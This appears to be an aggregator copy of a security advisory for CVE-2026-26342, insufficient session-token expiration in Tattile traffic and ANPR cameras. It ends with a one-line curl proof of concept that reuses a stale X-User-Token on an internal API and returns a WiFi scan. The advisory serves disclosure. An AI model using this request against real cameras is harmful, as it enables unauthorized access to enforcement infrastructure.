Tattile Cameras 1.181.5 Insufficient Token (X-User-Token) Expiration

🗓️ 24 Feb 2026 00:00:00Reported by Gjoko KrsticType

zeroscience🔗 www.zeroscience.mk👁 113 Views

Insufficient token expiration in Tattile cameras allows reuse of old session credentials.

Reporter	Title	Published	Views	Family All 10
ATTACKERKB	CVE-2026-26342	24 Feb 202618:41	–	attackerkb
Circl	CVE-2026-26342	24 Feb 202621:43	–	circl
CNNVD	Tattile Smart+ 代码问题漏洞	24 Feb 202600:00	–	cnnvd
CVE	CVE-2026-26342	24 Feb 202618:41	–	cve
Cvelist	CVE-2026-26342 Tattile Smart+ / Vega / Basic <= 1.181.5 Insufficient Session Token Expiration	24 Feb 202618:41	–	cvelist
NVD	CVE-2026-26342	24 Feb 202620:27	–	nvd
Packet Storm	📄 Tattile Cameras 1.181.5 Insufficient Token Expiration	24 Feb 202600:00	–	packetstorm
Positive Technologies	PT-2026-21790	24 Feb 202600:00	–	ptsecurity
RedhatCVE	CVE-2026-26342	25 Feb 202622:17	–	redhatcve
Vulnrichment	CVE-2026-26342 Tattile Smart+ / Vega / Basic <= 1.181.5 Insufficient Session Token Expiration	24 Feb 202618:41	–	vulnrichment

<html><body><p>Tattile Cameras 1.181.5 Insufficient Token (X-User-Token) Expiration

Vendor: Tattile s.r.l.
Product web page: https://www.tattile.com
Affected version: Smart+ family: Smart+
                                 Tolling+
                                 Smart+ Speed
                                 Smart+ Traffic Light
                  Vega family: Axle Counter
                               Vega 53
                               Vega33 &amp; Vega 11
                  Basic family: Basic MK2
                                ANPR Mobile
                  Firmware: 1.181.5

Summary: Tattile is an Italian manufacturer specializing in advanced
ANPR/ALPR, traffic‑enforcement, and machine‑vision camera systems used
across intelligent transportation networks, tolling infrastructures,
access‑control environments, and industrial automation. Their portfolio
includes high‑performance ITS cameras capable of vehicle identification,
speed and red‑light enforcement, free‑flow tolling, and multi‑lane traffic
monitoring, as well as compact ANPR units for parking and perimeter control,
and industrial smart cameras for inspection and quality assurance. Across
all model families, Tattile devices combine ruggedized hardware with onboard
image processing, AI‑based vehicle analytics, and high‑sensitivity sensors
designed for continuous operation in demanding outdoor conditions, making
them critical components in modern traffic management and enforcement
architectures.

Desc: The application suffers an insufficient session expiration. This occurs
when the web application permits an attacker to reuse old session credentials
or tokens for authorization. Insufficient session expiration increases the
device's exposure to attacks that can steal or reuse user's session identifiers.

Tested on: lighttpd/1.4.64


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2026-5976
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5976.php
CVE ID: CVE-2026-26342
CVE URL: https://www.cve.org/CVERecord?id=CVE-2026-26342


22.01.2026

--


$ curl -k "https://cameraIP/api/__internal__/__hal__/wifi/network/scan" \
&gt; -H "X-User-Token: dfaf1d9c-3ef6-442e-70f2-0f86f965542b"
[
    {
        "encryption": "WPA/WPA2",
        "essid": "QuantumOverflow",
        "signal_quality": 60
    },
    {
        "encryption": "WPA2",
        "essid": "PacketSorcery",
        "signal_quality": 78
    },
    {
        "encryption": "WPA2",
        "essid": "Jovanovic",
        "signal_quality": 70
    },
    {
        "encryption": "WPA/WPA2",
        "essid": "TP-31337",
        "signal_quality": 50
    },
    {
        "encryption": "WPA/WPA2",
        "essid": "entropyengine",
        "signal_quality": 57
    },
    {
        "encryption": "WPA2",
        "essid": "DarkMatterLAN",
        "signal_quality": 71
    },
    {
        "encryption": "WPA2",
        "essid": "hexadecimalHavoc",
        "signal_quality": 54
    },
    {
        "encryption": "WPA2",
        "essid": "neural-nexus",
        "signal_quality": 60
    },
    {
        "encryption": "WPA2",
        "essid": "ZSL_Guest",
        "signal_quality": 57
    },
    {
        "encryption": "WPA2",
        "essid": "WIFI_CORP",
        "signal_quality": 68
    },
    {
        "encryption": "WPA2",
        "essid": "WLAN_MDM",
        "signal_quality": 67
    },
    {
        "encryption": "WPA2",
        "essid": "ForbiddenFrequency",
        "signal_quality": 67
    },
    {
        "encryption": "WPA/WPA2",
        "essid": "sagemcomFC00",
        "signal_quality": 54
    },
    {
        "encryption": "WPA/WPA2",
        "essid": "vodafone1760",
        "signal_quality": 57
    },
    {
        "encryption": "WPA/WPA2",
        "essid": "It hurts when IP",
        "signal_quality": 54
    },
    {
        "encryption": "WPA/WPA2",
        "essid": "ZiggoF14256",
        "signal_quality": 71
    },
    {
        "encryption": "WPA2",
        "essid": "vodafoneAA60QK",
        "signal_quality": 58
    },
    {
        "encryption": "WPA2",
        "essid": "Deco1",
        "signal_quality": 55
    },
    {
        "encryption": "WPA/WPA2",
        "essid": "zeroscience.mk",
        "signal_quality": 58
    },
    {
        "encryption": "WPA/WPA2",
        "essid": "ddeshka",
        "signal_quality": 67
    }
]
</p></body></html>

24 Feb 2026 00:00Current

5.8Medium risk

Vulners AI Score5.8

CVSS 3.19.8

CVSS 48.7

EPSS0.00716

SSVC